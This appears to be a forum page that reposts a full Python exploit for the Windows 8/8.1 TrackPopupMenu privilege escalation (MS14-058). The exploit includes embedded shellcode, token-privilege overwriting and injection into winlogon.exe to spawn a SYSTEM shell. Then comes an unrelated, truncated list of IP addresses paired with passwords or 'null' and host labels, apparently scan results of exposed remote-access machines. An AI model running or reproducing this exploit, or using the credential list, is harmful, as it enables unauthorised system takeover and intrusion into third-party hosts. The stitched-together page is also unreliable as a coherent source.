Search the Community

# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # http://www.offensive-security.com # Thx to Moritz Jodeit for the beautiful writeup # http://www.exploit-db.com/docs/35152.pdf # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin <at> offensive-security.com from ctypes import * from ctypes.wintypes import * import struct, sys, os, time, threading, signal ULONG_PTR = PVOID = LPVOID HCURSOR = HICON PDWORD = POINTER(DWORD) PQWORD = POINTER(LPVOID) LRESULT = LPVOID UCHAR = c_ubyte QWORD = c_ulonglong CHAR = c_char NTSTATUS = DWORD MIIM_STRING = 0x00000040 MIIM_SUBMENU = 0x00000004 WH_CALLWNDPROC = 0x4 GWLP_WNDPROC = -0x4 NULL = 0x0 SystemExtendedHandleInformation = 64 ObjectDataInformation = 2 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_BUFFER_OVERFLOW = 0x80000005L STATUS_INVALID_HANDLE = 0xC0000008L STATUS_BUFFER_TOO_SMALL = 0xC0000023L STATUS_SUCCESS = 0 TOKEN_ALL_ACCESS = 0xf00ff DISABLE_MAX_PRIVILEGE = 0x1 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) TH32CS_SNAPPROCESS = 0x02 WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM) WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM) WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM) bWndProcFlag = False bHookCallbackFlag = False EXPLOITED = False Hmenu01 = Hmenu02 = None # /* # * windows/x64/exec - 275 bytes # * http://www.metasploit.com # * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, # * CMD=cmd.exe # */ SHELLCODE = ( "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" "\x2e\x65\x78\x65\x00") class LSA_UNICODE_STRING(Structure): """Represent the LSA_UNICODE_STRING on ntdll.""" _fields_ = [ ("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", LPWSTR), ] class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" _fields_ = [ ("Object", PVOID), ("UniqueProcessId", PVOID), ("HandleValue", PVOID), ("GrantedAccess", ULONG), ("CreatorBackTraceIndex", USHORT), ("ObjectTypeIndex", USHORT), ("HandleAttributes", ULONG), ("Reserved", ULONG), ] class SYSTEM_HANDLE_INFORMATION_EX(Structure): """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" _fields_ = [ ("NumberOfHandles", PVOID), ("Reserved", PVOID), ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), ] class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" _fields_ = [ ("Name", LSA_UNICODE_STRING), ("Reserved", ULONG * 22), ] class MENUITEMINFO(Structure): """Contains information about a menu item.""" _fields_ = [ ("cbSize" , UINT), ("fMask" , UINT), ("fType" , UINT), ("fState" , UINT), ("wID" , UINT), ("hSubMenu" , HMENU), ("hbmpChecked" , HBITMAP), ("hbmpUnchecked", HBITMAP), ("dwItemData" , ULONG_PTR), ("dwTypeData" , LPWSTR), ("cch" , UINT), ("hbmpItem" , HBITMAP), ] class WNDCLASS(Structure): """Contains the window class attributes that are registered by the RegisterClass function.""" _fields_ = [ ("style" , UINT), ("lpfnWndProc" , WNDPROC), ("cbClsExtra" , INT), ("cbWndExtra" , INT), ("hInstance" , HINSTANCE), ("hIcon" , HCURSOR), ("hCursor" , HBITMAP), ("hbrBackground", HBRUSH), ("lpszMenuName" , LPWSTR), ("lpszClassName", LPWSTR), ] class PROCESSENTRY32(Structure): """Describes an entry from a list of the processes residing in the system address space when a snapshot was taken.""" _fields_ = [ ( 'dwSize' , DWORD ) , ( 'cntUsage' , DWORD) , ( 'th32ProcessID' , DWORD) , ( 'th32DefaultHeapID' , POINTER(ULONG)) , ( 'th32ModuleID' , DWORD) , ( 'cntThreads' , DWORD) , ( 'th32ParentProcessID' , DWORD) , ( 'pcPriClassBase' , LONG) , ( 'dwFlags' , DWORD) , ( 'szExeFile' , CHAR * MAX_PATH ) ] user32 = windll.user32 kernel32 = windll.kernel32 ntdll = windll.ntdll advapi32 = windll.advapi32 user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.PostMessageW.restype = BOOL user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.DefWindowProcW.restype = LRESULT user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1] user32.UnhookWindowsHook.restype = BOOL user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2] user32.SetWindowLongPtrW.restype = LPVOID user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM] user32.CallNextHookEx.restype = LRESULT user32.RegisterClassW.argtypes = [LPVOID] user32.RegisterClassW.restype = BOOL user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD, INT, INT, INT, INT, HWND, HMENU, HINSTANCE, LPVOID] user32.CreateWindowExW.restype = HWND user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID] user32.InsertMenuItemW.restype = BOOL user32.DestroyMenu.argtypes = [HMENU] user32.DestroyMenu.restype = BOOL user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD] user32.SetWindowsHookExW.restype = BOOL user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND, DWORD] user32.TrackPopupMenu.restype = BOOL advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)] advapi32.OpenProcessToken.restype = BOOL advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, POINTER(HANDLE)] advapi32.CreateRestrictedToken.restype = BOOL advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD, DWORD, DWORD] advapi32.AdjustTokenPrivileges.restype = BOOL advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE] advapi32.ImpersonateLoggedOnUser.restype = BOOL kernel32.GetCurrentProcess.restype = HANDLE kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD, POINTER(LPVOID)] kernel32.WriteProcessMemory.restype = BOOL kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD] kernel32.OpenProcess.restype = HANDLE kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD, DWORD] kernel32.VirtualAllocEx.restype = LPVOID kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD, LPVOID, DWORD, POINTER(HANDLE)] kernel32.CreateRemoteThread.restype = BOOL kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD] kernel32.CreateToolhelp32Snapshot.restype = HANDLE kernel32.CloseHandle.argtypes = [HANDLE] kernel32.CloseHandle.restype = BOOL kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32First.restype = BOOL kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32Next.restype = BOOL kernel32.GetCurrentThreadId.restype = DWORD ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID, ULONG, DWORD] ntdll.NtAllocateVirtualMemory.restype = NTSTATUS ntdll.NtQueryObject.argtypes = [HANDLE, DWORD, POINTER(PUBLIC_OBJECT_TYPE_INFORMATION), DWORD, DWORD] ntdll.NtQueryObject.restype = NTSTATUS ntdll.NtQuerySystemInformation.argtypes = [DWORD, POINTER(SYSTEM_HANDLE_INFORMATION_EX), DWORD, POINTER(DWORD)] ntdll.NtQuerySystemInformation.restype = NTSTATUS def log(msg, e=None): if e == "e": msg = "[!] " + msg if e == "d": msg = "[*] " + msg else: msg = "[+] " + msg print msg def getLastError(): """Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value, "e") else: log("Unknown Error", "e") class x_file_handles (Exception): pass def get_type_info(handle): """Get the handle type information.""" public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() size = DWORD(sizeof(public_object_type_information)) while True: result = ntdll.NtQueryObject(handle, ObjectDataInformation, byref(public_object_type_information), size, 0x0) if result == STATUS_SUCCESS: return public_object_type_information.Name.Buffer elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(public_object_type_information, size.value) elif result == STATUS_INVALID_HANDLE: return "INVALID HANDLE: %s" % hex(handle) else: raise x_file_handles("NtQueryObject", hex(result)) def get_handles(): """Return all the open handles in the system""" system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() size = DWORD (sizeof (system_handle_information)) while True: result = ntdll.NtQuerySystemInformation( SystemExtendedHandleInformation, byref(system_handle_information), size, byref(size) ) if result == STATUS_SUCCESS: break elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(system_handle_information, size.value) else: raise x_file_handles("NtQuerySystemInformation", hex(result)) pHandles = cast( system_handle_information.Handles, POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ system_handle_information.NumberOfHandles) ) for handle in pHandles.contents: yield handle.UniqueProcessId, handle.HandleValue, handle.Object def WndProc(hwnd, message, wParam, lParam): """Window procedure""" global bWndProcFlag if message == 289 and not bWndProcFlag: bWndProcFlag = True user32.PostMessageW(hwnd, 256, 40, 0) user32.PostMessageW(hwnd, 256, 39, 0) user32.PostMessageW(hwnd, 513, 0, 0) return user32.DefWindowProcW(hwnd, message, wParam, lParam) def hook_callback_one(code, wParam, lParam): """Sets a new address for the window procedure""" global bHookCallbackFlag if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\ not bHookCallbackFlag: bHookCallbackFlag = True if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01): # Sets a new address for the window procedure log("Callback triggered!") log("Setting the new address for the window procedure...") lpPrevWndFunc = user32.SetWindowLongPtrW\ ((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value, GWLP_WNDPROC, CALLBACK02) return user32.CallNextHookEx(0, code, wParam, lParam) def hook_callback_two(hWnd, Msg, wParam, lParam): """Once called will return the fake tagWND address""" global EXPLOITED user32.EndMenu() EXPLOITED = True log("Returning the fake tagWND and overwriting token privileges...") return 0x00000000FFFFFFFB def buildMenuAndTrigger(): """Create menus and invoke TrackPopupMenu""" global Hmenu01, Hmenu02 log("Creating windows and menus...") wndClass = WNDCLASS() wndClass.lpfnWndProc = WNDPROC(WndProc) wndClass.lpszClassName = u"pwned" wndClass.cbClsExtra = wndClass.cbWndExtra = 0 # Registering Class if not user32.RegisterClassW(addressof(wndClass)): log("RegisterClassW failed", "e") sys.exit() # Creating the Window hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL) if not hWnd: log("CreateWindowExW Failed", "e") sys.exit() # Creating popup menu user32.CreatePopupMenu.restype = HMENU Hmenu01 = user32.CreatePopupMenu() if not Hmenu01: log("CreatePopupMenu failed 0x1", "e") sys.exit() Hmenu01Info = MENUITEMINFO() Hmenu01Info.cbSize = sizeof(MENUITEMINFO) Hmenu01Info.fMask = MIIM_STRING # Insert first menu if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)): log("Error in InsertMenuItema 0x1", "e") user32.DestroyMenu(Hmenu01) sys.exit() # Creating second menu Hmenu02 = user32.CreatePopupMenu() if not Hmenu02: log("CreatePopupMenu failed 0x2", "e") sys.exit() Hmenu02Info = MENUITEMINFO() Hmenu02Info.cbSize = sizeof(MENUITEMINFO) Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU) Hmenu02Info.dwTypeData = "" Hmenu02Info.cch = 1 Hmenu02Info.hSubMenu = Hmenu01 # Insert second menu if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)): log("Error in InsertMenuItema 0x2", "e") user32.DestroyMenu(Hmenu01) user32.DestroyMenu(Hmenu01) sys.exit() # Set window callback tid = kernel32.GetCurrentThreadId() if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid): log("Failed SetWindowsHookExA 0x1", "e") sys.exit() # Crash it! log("Invoking TrackPopupMenu...") user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL) def alloctagWND(): """Allocate a fake tagWND in userspace at address 0x00000000fffffff0""" hProcess = HANDLE(kernel32.GetCurrentProcess()) hToken = HANDLE() hRestrictedToken = HANDLE() if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)): log("Could not open current process token", "e") getLastError() sys.exit() if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, byref(hRestrictedToken)): log("Could not create the restricted token", "e") getLastError() sys.exit() if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0, NULL, NULL): log("Could not adjust privileges to the restricted token", "e") getLastError() sys.exit() # Leak Token addresses in kernel space log("Leaking token addresses from kernel space...") for pid, handle, obj in get_handles(): if pid==os.getpid() and get_type_info(handle) == "Token": if hToken.value == handle: log("Current process token address: %x" % obj) if hRestrictedToken.value == handle: log("Restricted token address: %x" % obj) RestrictedToken = obj CurrentProcessWin32Process = "\x00"*8 # nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES # +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8 TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8) tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\ "\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\ "\x00"*8 +\ "\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\ TokenAddress + "\x47"*0x28 ## Allocate space for the input buffer lpBaseAddress = LPVOID(0x00000000fffffff0) Zerobits = ULONG(0) RegionSize = LPVOID(0x1000) written = LPVOID(0) dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff, byref(lpBaseAddress), 0x0, byref(RegionSize), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if dwStatus != STATUS_SUCCESS: log("Failed to allocate tagWND object", "e") getLastError() sys.exit() # Copy input buffer to the fake tagWND nSize = 0x200 written = LPVOID(0) lpBaseAddress = QWORD(0x00000000fffffff0) dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff, lpBaseAddress, tagWND, nSize, byref(written)) if dwStatus == 0: log("Failed to copy the input buffer to the tagWND object", "e") getLastError() sys.exit() log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\ (written.value, lpBaseAddress.value)) return hRestrictedToken def injectShell(hPrivilegedToken): """Impersonate privileged token and inject shellcode into winlogon.exe""" while not EXPLOITED: time.sleep(0.1) log("-"*70) log("Impersonating the privileged token...") if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken): log("Could not impersonate the privileged token", "e") getLastError() sys.exit() # Get winlogon.exe pid pid = getpid("winlogon.exe") # Get a handle to the winlogon process we are injecting into hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid)) if not hProcess: log("Couldn't acquire a handle to PID: %s" % pid, "e") sys.exit() log("Obtained handle 0x%x for the winlogon.exe process" % hProcess) # Creating shellcode buffer to inject into the host process sh = create_string_buffer(SHELLCODE, len(SHELLCODE)) code_size = len(SHELLCODE) # Allocate some space for the shellcode (in the program memory) sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if not sh_address: log("Could not allocate shellcode in the remote process") getLastError() sys.exit() log("Allocated memory at address 0x%x" % sh_address) # Inject shellcode in to winlogon.exe process space written = LPVOID(0) shellcode = QWORD(sh_address) dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, byref(written)) if not dwStatus: log("Could not write shellcode into winlogon.exe", "e") getLastError() sys.exit() log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address)) # Now we create the remote thread and point its entry routine to be head of # our shellcode thread_id = HANDLE(0) if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, byref(thread_id)): log("Failed to inject shellcode into winlogon.exe") sys.exit(0) log("Remote thread 0x%08x created" % thread_id.value) log("Spawning SYSTEM shell...") # Kill python process to kill the window and avoid BSODs os.kill(os.getpid(), signal.SIGABRT) def getpid(procname): """ Get Process Pid by procname """ pid = None try: hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pe32 = PROCESSENTRY32() pe32.dwSize = sizeof(PROCESSENTRY32) ret = kernel32.Process32First(hProcessSnap , byref(pe32)) while ret: if pe32.szExeFile == LPSTR(procname).value: pid = pe32.th32ProcessID ret = kernel32.Process32Next(hProcessSnap, byref(pe32)) kernel32.CloseHandle ( hProcessSnap ) except Exception, e: log(str(e), "e") if not pid: log("Could not find %s PID" % procname) sys.exit() return pid CALLBACK01 = WinFunc1(hook_callback_one) CALLBACK02 = WinFunc2(hook_callback_two) if __name__ == '__main__': log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com", "d") # Prepare the battlefield hPrivilegedToken = alloctagWND() # Start the injection thread t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,)) t1.daemon = False t1.start() # Trigger the vuln buildMenuAndTrigger() Source

120.146.197.66 a [dvr 0] 115.31.135.29 null [DELL SERVER6] 221.181.41.85 null 218.149.2.126 null [DBS] 218.151.63.40 null [NATURA FUELCELL] 115.29.194.88 123 218.161.34.53 1234 [sun ( 192.168.1.9 ) service mode] 218.149.237.95 123456 [mvodtown 0] 218.155.166.134 123456 [mvodtown 0] 218.155.201.8 123456 [mvodtown 0] 218.157.171.55 123456 [mvodtown 0] 218.158.75.143 123456 [mvodtown 0] 218.158.117.83 123456 [mvodtown 0] 218.161.18.197 123456 [¦x¦¿©± ( 218.161.18.197, 192.168.1.101 ) application mode] 218.161.3.45 123456 [®õ¶¶©± ( 218.161.3.45, 192.168.1.3 ) application mode] 218.161.91.172 123456 [pos2 ( 192.168.10.252 )] 218.161.91.237 123456 [pos2 ( 192.168.10.252 )] 218.161.91.195 123456 [pos2 ( 192.168.10.252 )] 115.42.193.188 1234567 [my cms asp ( 10.0.1.218 ) service mode] 218.161.38.68 12345678 [ws1 ( 192.168.1.113 )] 218.161.23.50 12345678 [å¾éµ¬éˆžçš„伺æœå™¨] 115.47.47.190 null [QEMU (instance 00014820)] 218.155.121.90 11111111 [dangjung1 ( 192.168.0.10 )] 115.47.47.97 null [QEMU (instance 00008308)] 115.47.47.87 null [QEMU (instance 00006d56)] 115.47.47.85 null [QEMU (instance 00004d36)] 115.47.47.90 null [QEMU (instance 00010842)] 115.47.47.107 null [QEMU (instance 00006ec8)] 115.47.47.86 null [QEMU (instance 000067e3)] 115.47.47.92 null [QEMU (instance 0000839f)] 115.47.47.93 null [QEMU (instance 00008b0d)] 115.47.47.88 null [QEMU (instance 00004dc4)] 115.47.47.96 null [QEMU (instance 00008353)] 115.47.47.101 null [QEMU (instance 0000a264)] 115.47.47.91 null [QEMU (instance 000055e8)] 115.47.47.110 null [QEMU (instance 000090c1)] 115.47.47.94 null [QEMU (instance 0000be41)] 115.47.47.95 null [QEMU (instance 0000544e)] 115.47.47.102 null [QEMU (instance 00008525)] 115.47.47.117 null [QEMU (instance 000097cf)] 115.47.47.99 null [QEMU (instance 00007aed)] 115.47.47.89 null [QEMU (instance 00006843)] 115.47.47.103 null [QEMU (instance 00008cdf)] 115.47.47.105 null [QEMU (instance 0000ad70)] 115.47.47.127 null [QEMU (instance 0000fa41)] 115.47.47.108 null [QEMU (instance 00009249)] 115.47.47.104 null [QEMU (instance 000089f9)] 115.47.47.114 null [QEMU (instance 000093bf)] 115.47.47.120 null [QEMU (instance 0000f01b)] 115.47.47.130 null [QEMU (instance 0000a8d2)] 115.47.47.113 null [QEMU (instance 0000932f)] 115.47.47.109 null [QEMU (instance 00009175)] 115.47.47.118 null [QEMU (instance 0000bb38)] 115.47.47.106 null [QEMU (instance 0000827f)] 115.47.47.100 null [QEMU (instance 0000d805)] 115.47.47.125 null [QEMU (instance 0000dba0)] 115.47.47.121 null [QEMU (instance 00010203)] 115.47.47.143 null [QEMU (instance 0000fba2)] 115.47.47.119 null [QEMU (instance 0001235c)] 115.47.47.116 null [QEMU (instance 0000b5d0)] 115.47.47.123 null [QEMU (instance 0000a4e6)] 115.47.47.111 null [QEMU (instance 000090c0)] 115.47.47.122 null [QEMU (instance 0000a680)] 115.47.47.124 null [QEMU (instance 0000ffb8)] 115.47.47.115 null [QEMU (instance 00009310)] 115.47.47.112 null [QEMU (instance 00006497)] 115.47.47.128 null [QEMU (instance 0000aef3)] 115.47.47.126 null [QEMU (instance 0000ac6d)] 115.47.47.137 null [QEMU (instance 00010369)] 115.47.47.138 null [QEMU (instance 0000c6eb)] 115.47.47.132 null [QEMU (instance 0000c83a)] 115.47.47.131 null [QEMU (instance 00006945)] 115.47.47.133 null [QEMU (instance 0000c1c3)] 115.47.47.141 null [QEMU (instance 0000cb8b)] 115.47.47.135 null [QEMU (instance 0000ea61)] 115.47.47.140 null [QEMU (instance 000133d6)] 115.47.47.144 null [QEMU (instance 0000c8ce)] 115.47.47.129 null [QEMU (instance 0000ac30)] 115.47.47.142 null [QEMU (instance 0001004e)] 115.47.47.139 null [QEMU (instance 00012022)] 115.47.47.136 null [QEMU (instance 0000c3cb)] 115.47.47.134 null [QEMU (instance 0000bffc)] 115.47.47.150 null [QEMU (instance 0000d246)] 115.47.47.145 null [QEMU (instance 00000d5f)] 115.47.47.148 null [QEMU (instance 0000cbb6)] 115.47.47.151 null [QEMU (instance 0000d9d4)] 115.47.47.146 null [QEMU (instance 0000c72f)] 115.47.47.147 null [QEMU (instance 0000cc3d)] 115.47.47.167 null [QEMU (instance 00014cb3)] 115.47.47.171 null [QEMU (instance 0000f6a5)] 115.47.47.176 null [QEMU (instance 00013dd6)] 115.47.47.152 null [QEMU (instance 00000372)] 115.47.47.149 null [QEMU (instance 0000e2de)] 115.47.47.156 null [QEMU (instance 0000d333)] 115.47.47.154 null [QEMU (instance 0000ee82)] 115.47.47.155 null [QEMU (instance 000149fc)] 115.47.47.157 null [QEMU (instance 0000c6db)] 115.47.47.153 null [QEMU (instance 000107aa)] 115.47.47.158 null [QEMU (instance 000150c1)] 115.47.47.163 null [QEMU (instance 00010209)] 115.47.47.162 null [QEMU (instance 0000e7df)] 115.47.47.174 null [QEMU (instance 0000f706)] 115.47.47.191 null [QEMU (instance 00012852)] 115.47.47.164 null [QEMU (instance 00014136)] 115.47.47.160 null [QEMU (instance 0000f843)] 115.47.47.166 null [QEMU (instance 00014c80)] 115.47.47.169 null [QEMU (instance 0000f19a)] 115.47.47.159 null [QEMU (instance 00010ad8)] 115.47.47.165 null [QEMU (instance 0000e0f1)] 115.47.47.161 null [QEMU (instance 000061ec)] 115.47.47.170 null [QEMU (instance 00011bfa)] 115.47.47.168 null [QEMU (instance 0000f8ef)] 115.47.47.184 null [QEMU (instance 00010d58)] 115.47.47.181 null [QEMU (instance 0001369a)] 115.47.47.172 null [QEMU (instance 00011bc3)] 115.47.47.173 null [QEMU (instance 00010211)] 115.47.47.175 null [QEMU (instance 0000f846)] 115.47.47.178 null [QEMU (instance 0000973d)] 115.47.47.182 null [QEMU (instance 00010d65)] 115.47.47.186 null [QEMU (instance 00010d4a)] 115.47.47.189 null [QEMU (instance 00014842)] 115.47.47.177 null [QEMU (instance 0001518f)] 115.47.47.183 null [QEMU (instance 00010f7d)] 115.47.47.180 null [QEMU (instance 0000fa81)] 115.47.47.185 null [QEMU (instance 00010f50)] 115.47.47.188 null [QEMU (instance 00013f3d)] 115.47.47.179 null [QEMU (instance 000114cb)] 115.47.47.187 null [QEMU (instance 00011b1e)] 115.47.47.9 null [QEMU (instance 00012f28)] 115.47.47.10 null [QEMU (instance 00000938)] 115.47.47.2 null [QEMU (instance 000003a4)] 115.47.47.12 null [QEMU (instance 00000a3b)] 115.47.47.6 null [QEMU (instance 00001048)] 115.47.47.3 null [QEMU (instance 00000cf6)] 115.47.47.5 null [QEMU (instance 00007b27)] 115.47.47.1 null [QEMU (instance 0000051c)] 115.47.47.8 null [QEMU (instance 0000194a)] 115.47.47.7 null [QEMU (instance 000102d7)] 115.47.47.4 null [QEMU (instance 00000478)] 115.47.47.11 null [QEMU (instance 00000946)] 115.47.47.13 null [QEMU (instance 00013c3f)] 115.47.47.14 null [QEMU (instance 00010869)] 115.47.47.20 null [QEMU (instance 0000e61f)] 115.47.47.18 null [QEMU (instance 000013b0)] 115.47.47.15 null [QEMU (instance 0000d32a)] 115.47.47.17 null [QEMU (instance 000011a6)] 115.47.47.16 null [QEMU (instance 0000e64a)] 115.47.47.21 null [QEMU (instance 000067fe)] 115.47.47.28 null [QEMU (instance 0000a3b6)] 115.47.47.19 null [QEMU (instance 0000633d)] 115.47.47.27 null [QEMU (instance 000020f9)] 115.47.47.22 null [QEMU (instance 0000c7cb)] 115.47.47.30 null [QEMU (instance 00005d8b)] 115.47.47.25 null [QEMU (instance 00008348)] 115.47.47.24 null [QEMU (instance 0000652f)] 115.47.47.23 null [QEMU (instance 000067bf)] 115.47.47.26 null [QEMU (instance 000048d9)] 115.47.47.29 null [QEMU (instance 00004c08)] 115.42.193.182 password [tha cms asp ( 10.0.1.12 ) service mode] 115.42.193.189 password [cms asp ( 10.0.1.9 ) service mode] 218.155.181.222 password [kr3210023d ( 218.155.181.222 )] 115.47.48.2 null [QEMU (instance 0000023a)] 115.47.48.1 null [QEMU (instance 000001f9)] 115.47.48.3 null [QEMU (instance 00000d21)] 115.47.47.34 null [QEMU (instance 00005642)] 115.47.47.36 null [QEMU (instance 00005cae)] 115.47.47.42 null [QEMU (instance 000024cd)] 115.47.47.40 null [QEMU (instance 00006688)] 115.47.47.43 null [QEMU (instance 00006994)] 115.47.47.58 null [QEMU (instance 0000ea92)] 115.47.47.33 null [QEMU (instance 00001c81)] 115.47.47.31 null [QEMU (instance 000082a0)] 115.47.47.54 null [QEMU (instance 0000e38c)] 115.47.47.32 null [QEMU (instance 00007975)] 115.47.47.39 null [QEMU (instance 000023b6)] 115.47.47.45 null [QEMU (instance 0000a88c)] 115.47.47.41 null [QEMU (instance 00002569)] 115.47.47.35 null [QEMU (instance 00001d75)] 115.47.47.37 null [QEMU (instance 000021ba)] 115.47.47.38 null [QEMU (instance 0000230e)] 115.47.47.60 null [QEMU (instance 0000493a)] 115.47.47.76 null [QEMU (instance 00013dd4)] 115.47.47.53 null [QEMU (instance 00007ca3)] 115.47.47.67 null [QEMU (instance 00007ee3)] 115.47.47.73 null [QEMU (instance 00009bb2)] 115.47.47.63 null [QEMU (instance 00003963)] 115.47.47.68 null [QEMU (instance 000089c3)] 115.47.47.80 null [QEMU (instance 000063ee)] 115.47.47.55 null [QEMU (instance 000041ed)] 115.47.47.57 null [QEMU (instance 0000b620)] 115.47.47.64 null [QEMU (instance 000056fd)] 115.47.47.59 null [QEMU (instance 00002c3f)] 115.47.47.65 null [QEMU (instance 00002f0c)] 115.47.47.62 null [QEMU (instance 00010111)] 115.47.47.66 null [QEMU (instance 00002e31)] 115.47.47.61 null [QEMU (instance 00004c79)] 115.47.47.69 null [QEMU (instance 0000ea8a)] 115.47.47.56 